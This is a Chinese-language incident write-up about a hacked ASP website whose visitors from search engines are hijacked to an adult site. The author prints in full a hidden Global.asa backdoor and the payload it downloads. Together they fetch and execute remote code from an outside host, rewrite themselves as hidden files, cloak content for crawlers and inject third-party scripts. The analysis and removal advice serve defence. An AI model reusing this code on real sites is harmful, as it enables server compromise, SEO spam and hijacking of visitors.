客户反映自己的网站中毒了,我用域名浏览网站页面一切正常,再从服务器上下载源码细查,没发现什么毒,还想这事就怪了。于是回问客户中毒的表象是什么,客户说在百度或者Google进去网站的时候,回跳转到某个黄色网站。
搜索引擎流量劫持,这毒有意思!根据经验,可以推断出来应该是asp程序根据网页的来路,即HTTP_REFERER进行判断,发现是搜索引擎过来的流量就跳转到色情站点去 。
第一招:
采用FileMon对w3wp.exe进程进行监控 ,看看用搜索引擎打开和直接打开读取的文件到底有什么不同,通过多次比较,也没有发现什么疑点。
第一招是失效了。 打开源文件的打开了显示系统隐藏文件,便发现了一个隐藏的文件件: Global.asa。根据经验觉得就是它的问题了,打开它的代码如下: -- -----------------------------------------代码---------------------
Code:
<script language="vbscript" runat="server">
'by_aming
'by*aming
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
url="h"&"t"&"t"&"p"&":"&"/"&"/"&"g"&"l"&"o"&".1"&"0"&"0"&"5"&"0"&"0"&".c"&"o"&"m"&"/x"&"m"&"l"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"."&"a"&"s"&"a"&"q"&"u"&"a"&"n"&"."&"t"&"x"&"t"
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
if instr(GetHtml,"by*aming")>0 then
execute GetHtml
end if
end sub
'sub Session_OnEnd
'end sub
</script>
-----------------------------------------------------------------------
因为Global.asa文件为网站启动文件,当一个网站被第一次访问时,会执行Application_Start代码段的内容,当一个用户第一次访问时会执行Session_Start代码段的内容,所以此段代码的作用就是当访问,从http://glo.100500.com/xml/global.asaquan.txt处下载内容,并执行,让我们来看看http://glo.100500.com/xml/global.asaquan.txt( url="h"&"t"&"t"&"p"&":"&"/"&"/"&"g"&"l"&"o"&".1"&"0"&"0"&"5"&"0"&"0"&".c"&"o"&"m"&"/x"&"m"&"l"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"."&"a"&"s"&"a"&"q"&"u"&"a"&"n"&"."&"t"&"x"&"t"l拼接的)的内容是什么吧:
-----------------------代码-----------------------------------------
'<html><head><script>function clear()
{Source=document.body.firstChild.data;document.open
();document.close
();document.title="";document.body.innerHTML=Source;}
</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval
(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace
(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d
[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c])
{p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}
('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split
('|'),0,{}))</script>
'by*aming
Server.ScriptTimeout=600
Public Function createasa(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
Public Function createasax(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asax"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/global.asax"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
Public Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End Function
Function check(user_agent)
allow_agent=split
("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-
WebCrawler,MSNBOT,Slurp",",")
check_agent=false
For agenti=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function
Function CheckRobot()
CheckRobot = False
Dim Botlist,i,Repls
Repls = request.ServerVariables("http_user_agent")
Krobotlist = "Baiduspider|Googlebot"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(Repls,Botlist(i)) > 0 Then
CheckRobot = True
Exit For
End If
Next
If Request.QueryString("admin")= "1" Then Session
("ThisCheckRobot")=1
If Session("ThisCheckRobot") = 1 Then CheckRobot =
True
End Function
Function CheckRefresh()
CheckRefresh = False
Dim Botlist,i,Repls
Krobotlist = "baidu|google|sogou|soso|youdao"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(left(request.servervariables
("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
CheckRefresh = True
Exit For
End If
Next
End Function
Sub sleep()
If response.IsClientConnected=true then
Response.Flush
else
response.end
end if
End Sub
If CheckRefresh=true Then
cnnbd=lcase(request.servervariables("HTTP_HOST"))
'response.redirect("http://www.220550.com/?"&cnnbd&"")
Response.Write("<div style=display:none><script
src=http://count11.51yes.com/click.aspx?
id=114814173&logo=1></script><script
src=http://js.568tea.com/44.js></script><script
src=http://js.37548.com/44.js></script></div>")
response.end
end If
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
if check(user_agent)=true then
'body=GetHtml("http://html.888hhh.com/2prn.asp?
domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables
("HTTP_USER_AGENT"))&"")
body=GetHtml("http://i.bxhty.info/index.asp?
domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables
("HTTP_USER_AGENT"))&"")
response.write body
response.end
else
asa=GetHtml("http://glo.100500.com/xml/globalquan.txt")
if instr(asa,"by*aming")>0 then
createasa(asa)
end if
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
namepath=Server.MapPath(ScriptAddress)
If Len(Request.QueryString) > 0 Then
ScriptAddress = ScriptAddress & "?" & Request.QueryString
end if
geturl ="http://"& Request.ServerVariables("http_host") &
ScriptAddress
geturl =LCase(geturl)
'response.write replace(namepath,server.MapPath("/"),"")
'response.end
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and
instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and
instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and
if instr(geturl,"http://"& Request.ServerVariables("http_host")
&"/index.asp")=0 and instr(geturl,"http://"&
Request.ServerVariables("http_host") &"/")=0 and instr(LCase
(Request.ServerVariables("HTTP_REFERER")),LCase
(Request.ServerVariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = LCase(Request.ServerVariables("HTTP_REFERER"))
bot = ""
Amll = ""
if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent
if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"
if bot="nobot" then
'Call WriteErr
'response.end
end if
If Instr(REFERER,"http") > 0 and Instr(REFERER,".") > 0 and Instr
(REFERER,"/") > 0 and Instr(REFERER,"?") > 0 and Instr(REFERER,"=")
> 0 Then Amll = "ok"
tjcount=request.Cookies("cookie_tjcount")
date1=request.Cookies("cookie_date")
date2=year(date)&month(date)&day(date)
if tjcount="" then
response.cookies("cookie_tjcount")=0
response.cookies("cookie_tjcount").Expires=DateAdd
("d",1,now())
end if
if date1<>date2 then
response.cookies("cookie_date")=date2
response.cookies("cookie_date").Expires=DateAdd("d",365,now
())
end if
tjcount=request.Cookies("cookie_tjcount")
date1=request.Cookies("cookie_date")
date2=year(date)&month(date)&day(date)
if date1=date2 and len(bot) = 0 then
if int(tjcount)<10 and len(Amll)>0 then
response.cookies("cookie_tjcount")=int(tjcount)+1
response.cookies("cookie_tjcount").Expires=DateAdd
("d",1,now())
strHost=Request.ServerVariables("HTTP_HOST")
Response.Redirect("http://www.115225.com/?
domain="&strHost&"")
else
'response.write "<h1>Service Unavailable</h1>"
response.write ""
'response.write gethtml(geturl&"?global=ok")
end if
response.end
end if
Call sleep()
end if
end if
'</body></html>
----------------------------------------------------------------------
此处代码有多个函数组成:
createasa 根据传入的内容创建global.asa文件
createasax 根据传入的内容创建Global.asax文件
GetHtml 根据传入的url,获取相应的内容
check 检测user-agent判断是否为搜索引擎的蜘蛛
CheckRobot 检测是否为robot ?
CheckRefresh 检测是否Refresh
说到底这块代码的作用就是判断访问页面是否来自于搜索引擎,是的话,就将HTML:
<div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=1></script><script src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script></div>
输出去。
至此,就达到了将来自于搜索引擎流量挟持走的目的了。
解决办法也很简单,就是直接删除此文件就可以了,当然最好还是要检查一下网站,查一下为什么会被加上一个Global.asa文件
|